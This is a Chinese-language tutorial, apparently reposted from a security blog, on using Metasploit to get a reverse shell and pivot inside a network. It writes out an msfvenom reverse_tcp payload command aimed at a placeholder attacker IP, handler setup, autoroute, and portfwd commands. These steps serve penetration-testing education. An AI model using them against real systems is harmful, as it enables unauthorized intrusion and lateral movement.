使用msf进行反弹shell+内网渗透

admin 2021年11月25日10:30:50评论312 views字数 1140阅读3分48秒阅读模式

首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令


反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。


一、反弹shell:


1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(这里指代的是攻击机ip) lport=xxxx(这里指代的是攻击机的监听端口)-f exe(这里指代的是可执行文件的类型)-o xx.exe”。即可创建被控端的客户端文件。


2.在攻击机的msf中启动监听模块,use exploit/multi/handler,并设置相应的payload,payload的选择取决于生成被控端文件用了什么模块,名字都是一样的。接着options设置好相应的参数。在这里需要指出的是,msfconsole一定要在root权限下执行。


3.接下来将生成的被控端文件放到靶机内,并在靶机内执行。msf就可以收到靶机的session,在msf中使用sessions命令即可看到当前收到的session,并使用session 1就可以取得第一个session的会话,呼出meterpreter模块,在meterpreter模块中输入shell即可实现反弹shell。


二、内网渗透


1.在达成以上步骤后,即可添加路由,添加路由使用msf自动添加即可。具体命令为:run post/multi/manage/autoroute。


2.路由设置完毕后,即可使用ifconfig或是ipconfig探测靶机的ip情况,并使用nmap等扫描工具,对其所在的网段进行扫描。进而发现其他内网中的靶机。


3.若我们发现了一个主机开放了80端口,我们可以想象这个主机开放了web服务,此时要对此端口进行端口转发,那么我们可以在meterpreter下使用msf自带的端口转发服务,具体命令如下:“portfwd add -l xxxx(本机待转发端口) -r xxx.xxx.xxx.xxx(待转发的内网主机地址) -p xxxx(待转发的内网主机端口)”。即可实现将内网主机的端口转发到本地某端口上,并可以在本地浏览器中输入localhost:xxxx进行访问并作进一步的渗透。


作者:JSMa4ter

原文链接:https://blog.csdn.net/JSMaster01/article/details/85402292

原文始发于微信公众号(天驿安全):使用msf进行反弹shell+内网渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月25日10:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用msf进行反弹shell+内网渗透https://cn-sec.com/archives/648683.html

发表评论

匿名网友 填写信息